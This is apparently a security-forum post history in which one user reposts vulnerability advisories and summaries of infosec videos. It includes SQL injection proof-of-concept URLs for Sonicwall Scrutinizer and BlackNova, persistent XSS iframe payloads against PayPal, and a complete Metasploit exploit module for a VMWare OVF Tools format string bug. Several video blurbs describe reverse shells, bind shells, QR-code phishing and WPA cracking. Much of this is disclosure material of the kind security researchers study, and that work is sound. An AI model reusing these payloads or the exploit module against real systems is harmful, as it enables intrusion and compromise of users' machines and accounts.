Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
  5. Praetorian503
    Sonicwall Scrutinizer version 9.5.2 suffers from a remote blind SQL injection vulnerability. Title: ====== Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability Date: ===== 2013-02-13 References: =========== http://www.vulnerability-lab.com/get_content.php?id=789 #9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon) #10149: Create a common function to escape characters that can be used for SQL injection #10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped #10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped #10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped VL-ID: ===== 789 Common Vulnerability Scoring System: ==================================== 7.3 Introduction: ============= Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html ) Abstract: ========= The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application. Report-Timeline: ================ 2012-12-05: Researcher Notification & Coordination 2012-12-07: Vendor Notification 2013-01-08: Vendor Response/Feedback 2013-02-10: Vendor Fix/Patch 2013-02-11: Public Disclosure Status: ======== Published Affected Products: ================== DELL Product: Sonicwall OEM Scrutinizer 9.5.2 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms. The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or gadget parameters. Exploitation requires no user interaction & without privileged application user account. Successful exploitation of the remote sql vulnerability results in dbms & application compromise. Vulnerable File(s): [+] fa_web.cgi Vulnerable Module(s): [+] gadget listing Vulnerable Parameter(s): [+] orderby [+] gadget Proof of Concept: ================= The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account and also without user interaction. For demonstration or reproduce ... PoC: http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27 http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27 Solution: ========= 1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query 2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection Risk: ===== The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
  6. Praetorian503
    This advisory documents the 17th PayPal bug bounty Vulnerability Labs received for a cross site scripting vulnerability. Title: ====== Paypal Bug Bounty #17 - Persistent Web Vulnerability Date: ===== 2013-01-28 References: =========== http://www.vulnerability-lab.com/get_content.php?id=671 PayPal UID: tlm30fdsh VL-ID: ===== 671 Common Vulnerability Scoring System: ==================================== 3 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Vendor Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official Paypal ecommerce website application. Report-Timeline: ================ 2012-07-30: Researcher Notification & Coordination 2012-07-31: Vendor Notification 2012-08-09: Vendor Response/Feedback 2013-01-14: Vendor Fix/Patch 2013-01-28: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent input validation vulnerability is detected in the official Paypal website application (Customer/Pro/Seller). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the paypal web service. The vulnerability is located in the Zertifikatsänderung des öffentlichen Schlüssels module with the bound vulnerable name & id mail listing parameters. The vulnerability can be exploited by remote attackers with low or medium required user inter action and with privileged Customer/Pro/Seller account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Module(s): [+] Zertifikatsänderung des öffentlichen Schlüssels (Delete too!) Vulnerable Parameter(s): [+] NAME & ID Affected Section(s): [+] Notification Mail Proof of Concept: ================= The vulnerability can be exploited by remote attackers with privileged user account and medium or high required user inter action. For demonstration or reproduce ... Review: Certificate Change Notification - Username & Company <html><head> <title>Zertifikatsänderung des öffentlichen Schlüssels</title> <link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"> </head> <body> <table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>Betreff: </b>Zertifikatsänderung des öffentlichen Schlüssels</td></tr><tr><td><b>Von: </b>"service@paypal.de" <service@paypal.de> </td></tr><tr><td><b>Datum: </b>Sat, 28 Jul 2012 22:49:45 -0700</td></tr></tbody></table><table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>denjo <x01445@gmail.com></td></tr></tbody></table><br> <div class="moz-text-plain"><pre wrap="">Guten Tag benjo >"<iframe src="http://vuln-lab.com">! Hiermit informieren wir Sie darüber, dass Sie erfolgreich ein Zertifikat des öffentlichen Schlüssels mit der folgenden ID hinzugefügt haben: 9XG235W6L7R92. HINWEIS: Wenn Sie kein Zertifikat des öffentlichen Schlüssels hinzufügen möchten, setzen Sie sich umgehend unter der auf der nächsten Seite angegebenen Rufnummer telefonisch mit uns in Verbindung: <a class="moz-txt-link-freetext" href="https://www.paypal.com/de/contact-phone">https://www.paypal.com/de/contact-phone</a> Herzliche Grüße Ihr PayPal-Team Review: Certificate Change Notification - ID <html><head> <title>Zertifikatsänderung des öffentlichen Schlüssels</title> <link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"> </head> <body> <table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td> <b>Betreff: </b>Zertifikatsänderung des öffentlichen Schlüssels</td></tr><tr><td><b>Von: </b>"service@paypal.de" <service@paypal.de></td></tr><tr><td><b>Datum: </b>Sat, 28 Jul 2012 22:49:45 -0700</td></tr></tbody></table> <table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>denjo schenjo <x01445@gmail.com></td></tr></tbody></table><br> <div class="moz-text-plain"><pre wrap="">Guten Tag denjo schenjo! Hiermit informieren wir Sie darüber, dass Sie erfolgreich ein Zertifikat des öffentlichen Schlüssels mit der folgenden ID hinzugefügt haben: 9XG137W6L7R92>"<iframe src="http://vuln-lab.com">. HINWEIS: Wenn Sie kein Zertifikat des öffentlichen Schlüssels hinzufügen möchten, setzen Sie sich umgehend unter der auf der nächsten Seite angegebenen Rufnummer telefonisch mit uns in Verbindung: <a class="moz-txt-link-freetext" href="https://www.paypal.com/de/contact-phone">https://www.paypal.com/de/contact-phone</a> Herzliche Grüße Ihr PayPal-Team Note: The ID notification will be send with the request of the changes. The attacker can manipulate the value by injecting via POST. The select of the notification will be handled by the post request and not by a special request to the real existing updated input of the database. The result of the request notification is the execution of the persistent malicious script code out of the ID context. Solution: ========= 2013-01-14: Vendor Fix/Patch by PayPal Security Team Risk: ===== The security risk of the persistent input validation vulnerability is estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
  7. Praetorian503
    Description: In this video I will show you how to generate Powershell script for reverse connection. Using this script you can get the shell easily. But this script is only work hidden when you execute remotely. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Set -- Powershell - Reverse Shell
  8. Praetorian503
    Description: In this video I will show you how to use Social Engineering toolkit for making QC code. Using QC code you can redirect a user on your webpage malicious webpage maybe you can perform a phishing attack and lot more. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Set - Qr Code + Beef + Smartphone
  9. Praetorian503
    Description: As smartphones enter the workplace, sharing the network and accessing sensitive data, it is crucial to be able to assess the security posture of these devices in much the same way we perform penetration tests on workstations and servers. However, smartphones have unique attack vectors that are not currently covered by available industry tools. The smartphone penetration testing framework, the result of a DARPA Cyber Fast Track project, aims to provide an open source toolkit that addresses the many facets of assessing the security posture of these devices. We will look at the functionality of the framework including information gathering, exploitation, social engineering, and post exploitation through both a traditional IP network and through the mobile modem, showing how this framework can be leveraged by security teams and penetration testers to gain an understanding of the security posture of the smartphones in an organization. We will also show how to use the framework through a command line console, a graphical user interface, and a smartphone based app. Demonstrations of the framework assessing multiple smartphone platforms will be shown. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Introducing The Smartphone Penetration Testing Framework
  10. Praetorian503
    Description: HTML5 opens up a wide and wonderful new world for Web Designers to explore - bringing fantastic new features that were previously only possible via Flash or horribly over-complicated Javascript. And HTML5 is not a future technology - chances are your favourite browser already has excellent support built in (unless you are still using IE). In this talk we will look at HTML5 from an attackers view-point. Because not only does HTML5 bring us Semantic web, editable content, inbuilt form validation, local storage, awesome video support and the long overdue death of div - it also opens up a host of new opportunities for attackers. We'll look at some of the troublesome new attacks that this new HTML5 standard introduces, how attackers can leverage these attacks to cause untold havoc on your machine, and how - with a little bit of help from some not so over-complicated Javascript - we can build Botnets in your Browser! I HAVE SHOES! BANANA! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Brucon 2012 - Html5 - A Whole New Attack Vector
  11. Praetorian503
    Description: This video is a post exploitation demo – I will show you how to bind shell using a Powershell script and metasploit. In this demo I will use Social-Engineering tool for Powershell Script and Metasploit for exploitation. Now ones you get the meterpreter shell generate Powershell script and use Metasploit post – exploitation module for Powershell script execution and scan your target using nmap and you will get one open port named with(*BACKDOOR*). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Bind Shell On Windows Using Metasploit + Powershell Script.
  12. Praetorian503
    Description: In this video I will show you basics usage of Maltego Advanced Information gathering tool. Matego is a very powerful GUI based Information gathering tool. Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format. Paterva / Maltego Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Information Gathering With Maltego
  13. Praetorian503
    Description: Nowadays, SAP Netweaver has become the most extensive platform for building enterprise applications and run critical business processess. In recent years it has become a hot topic in information security, at the time that headlines about hacks against SAP systems increases everyday. Although, while fixes and countermeasures are released monthly by SAP at an incredibly rate, the available security knowledge is limited and some components are still not well covered. SAP Diag is the application-level protocol used for communications between SAP GUI and SAP Netweaver Application Servers and it's a core part of any ABAP-based SAP Netwever installation. Therefore, if an attacker is able to compromise this component, this would result in a total takeover of a SAP system. In recent years, the Diag protocol has received some attention from the security community and several tools were released focused on decompression and sniffing. Nevertheless, protocol specification is not public and internal components and inner-workings remains unkown; the protocol was not understood and there is no publicly available tool for active exploitation of real attack vectors. This talk is about taking SAP penetration testing out of the shadows and sheedding some light into SAP Diag, by introducing a novel way to uncover vulnerabilities in SAP sofware through a set of tools that allows analysis and manipulation of the SAP Diag protocol. In addition, we will show how these tools and the acquired knowledge while researching the protocol can be used for vulnerability research, fuzzing and practical exploitation of novel attack vectors involving both SAP's client and server applications: man-in-the-middle attacks, RFC calls injection, rogue SAP servers deployment, SAP GUI client-side attacks and more. As a final note, this presentation will also show how to harden your SAP installations and mitigate these threats. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Brucon 2012 - Uncovering Sap Vulnerabilities: Dissecting And Breaking The Diag Protocol
  14. Praetorian503
    Description: Looking for vulnerabilities in closed source software is particularly difficult when the researcher is confronted with proprietary and/or undocumented protocols. Several approaches could be taken to attack this problem like for example, full reverse engineering or dumb fuzzing. Unfortunately, these are either incredibly time/brain consuming or highly inefficient. In this talk another way will be shown, namely, the manipulation of client software using binary instrumentation techniques in order to use them as kind of 'double agents' against the server they are talking to. Some small tools and code examples will be released after the talk for everybody to play with. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Brucon 2012 - How I Met Your Pointer (Hijacking Client Software For Fuzz And Profit)
  15. Praetorian503
    PM Sent!
  16. Praetorian503
    Ai PM.
  17. Praetorian503
    VMWare OVF Tools Format String Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VMWare OVF Tools Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Brown', # Vulnerability discovery 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'CVE', '2012-3569' ], [ 'OSVDB', '87117' ], [ 'BID', '56468' ], [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] ], 'Payload' => { 'DisableNops' => true, 'BadChars' => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x54\x59", # push esp # pop ecx 'EncoderOptions' => { 'BufferRegister' => 'ECX', 'BufferOffset' => 6 } }, 'Platform' => 'win', 'Targets' => [ # vmware-ovftool-2.1.0-467744-win-i386.msi [ 'VMWare OVF Tools 2.1 on Windows XP SP3', { 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 'AddrPops' => 98, 'StackPadding' => 38081, 'Alignment' => 4096 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 08 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']), ], self.class) end def ovf my_payload = rand_text_alpha(4) # ebp my_payload << [target.ret].pack("V") # eip # call esp my_payload << payload.encoded fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 fs << my_payload # 65536 => 0x10000 # 27 => Error message prefix length fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) fs << "%08x" * target['AddrPops'] # Reach saved EBP fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 ovf_file = <<-EOF <?xml version="1.0" encoding="UTF-8"?> <Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <References> <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> </References> <DiskSection> <Info>Virtual disk information</Info> <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> </DiskSection> <VirtualSystem ovf:id="Small VM"> <Info>A virtual machine</Info> </VirtualSystem> </Envelope> EOF ovf_file end def exploit print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1") file_create(ovf) end end Source: VMWare OVF Tools Format String Vulnerability
  18. Praetorian503
    BlackNova Traders, a web-based game similar to the BBS game TradeWars, suffers from a remote SQL injection vulnerability. BlackNova Traders (SQL Injection) Vulnerability Software : BlackNova Date : 2/12/2013 Vendor : http://blacknova.net/ Download : http://sourceforge.net/projects/blacknova/ Language : PHP Tested on: Windows OS + Apache Server Author : ITTIHACK Home : http://ittihack.com Description BlackNova Traders is a web-based, multi-player space exploration game inspired by the popular BBS game of TradeWars. It is coded using PHP, SQL, and Javascript. Vulnerable File: news.php Line# 43 : if (array_key_exists('startdate', $_GET) && ($_GET['startdate'] != '')) Exploit: http://localhost/bnt/news.php?startdate=2013/02/11[SQLi] Free Syria Source: PacketStorm
  19. Praetorian503
    Cu putina vointa si cu asta il poti sparge. A doua varianta ar fi COAILII v2.0 Nu te astepta sa te ajute cineva, i-am dat postului tau mare capac de i-a tiuit. //Edit: Serios acum, chiar asa se numeste. (lol)
  20. Praetorian503
    Description: This presentation is the new and improved anti-forensics version of those "Stupid Pet Tricks" segments on late night US talk shows. Nothing ground-breaking here, but there may be some ideas and techniques presented that forensic investigators haven't considered or encountered. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Brucon 2012 - Moar Anti-Forensics For The Louise
  21. Praetorian503
    Description: Why send someone an executable when you can just send them a sidebar gadget? We will be talking about the windows gadget platform and what the nastyness that can be done with it, how are gadgets made, how are they distributed and more importantly their weaknesses. Gadgets are comprised of JS, CSS and HTML and are application that the Windows operating system has embedded by default. As a result there are a number of interesting attack vectors that are interesting to explore and take advantage of. We will be talking about our research into creating malicious gadgets, misappropriating legitimate gadgets and the sorts of flaws we have found in published gadgets. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Brucon 2012 - We Have You By The Gadgets
  22. Praetorian503
    Description: This video demonstrates Cobalt Strike's ability to connect to and manage multiple servers as part of a sophisticated red team attack. One server sends phishing emails, another hosts the recon website, another hosts the attack, another receives beacons from compromised systems, and two others are used for post-exploitation. At the end of your engagement, Cobalt Strike will aggregate data from all the servers to provide a single report that documents your engagement. http://blog.strategiccyber.com/2013/02/12/a-vision-for-distributed-red-team-operations/ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: http://www.securitytube.net/video/6892
  23. Praetorian503
    Description: Welcome to Part 7 of the series! In this video, I discuss the great tool, airolib-ng, which is great for speeding up the WPA/WPA2 cracking process. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 7: Airolib-Ng
  24. Praetorian503
    IRIS Citations Management Tool (post auth) Remote Command Execution Here is a bug that I finally found time to write about https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/ The attached contains my mini framework, exploit and screenshot. Cheers! ~ aeon # I Read It Somewhere (IRIS) <= v1.3 (post auth) Remote Command Execution # download: http://ireaditsomewhere.googlecode.com # Notes: # - Found this in my archive, duno how long this has been 0Day for... but I had no use for it obviously. # - Yes! ..the code is disgusting, but does the job # - Sorry if I ripped your code, it worked for me and I dont reinvent wheels so thank you! # ~ aeon (https://infosecabsurdity.wordpress.com/) # # Exploit requirements: # ~~~~~~~~~~~~~~~~~~~~~ # # - A valid account as at least a user # - The target to have outgoing internet connectivity Exploit: http://www.exploit-db.com/sploits/24480.tar.gz Source: IRIS Citations Management Tool (post auth) Remote Command Execution
  25. Praetorian503
    IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability # Exploit Title: IP.Gallery 4.2.x and 5.0.x persistent XSS vulnerability # Date: 8/2/2013 # Exploit Author: Mohamed Ramadan # Author HomePage: http://www.Attack-Secure.com # Author Twitter : https://twitter.com/Attack_Secure # Vendor Homepage: http://www.invisionpower.com/ # Software Link: http://www.invisionpower.com/apps/gallery/ # Version: IP.Gallery 4.2.x and 5.0.x image title is vulnerable to persistent XSS vulnerability which allow any normal member to hack any administrator account or any other member account. we contacted the vendor and reported this issue to them and they fixed it and released this patch: http://community.invisionpower.com/topic/379028-ipgallery-42x-and-50x-security-update/ Here is a video demonstrating the attack in action : https://docs.google.com/file/d/0B_cpjifQmPbZMmxVcEdqU3A1aU0/edit?usp=sharing and here is another video demonstrating how to bypass httponly cookies : https://docs.google.com/file/d/0B_cpjifQmPbZemFsbFJDRnVkVTA/edit?usp=sharing Mohamed Ramadan ( Attack-Secure.com ) Source: IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability
×
×
  • Create New...